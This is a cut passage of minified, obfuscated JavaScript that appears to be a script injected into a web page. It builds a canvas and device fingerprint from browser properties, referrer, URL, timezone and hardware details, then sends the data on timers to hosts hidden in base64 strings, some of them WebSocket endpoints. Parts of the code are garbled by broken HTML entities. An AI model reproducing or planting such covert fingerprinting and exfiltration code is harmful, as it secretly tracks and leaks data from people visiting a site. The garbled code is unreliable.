Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tqZmtkbHNqZmRzLnN6ZmhsOTkuYY29t','d3NNzOi8vd3MuYXJ0cy1jbG91ZC5uZXQ6ODU4NNSx3c3M6Ly93cy5qaW5mdTIxLmNNvbTo4NNTg1',window,document,['Y','N']);}:function(){};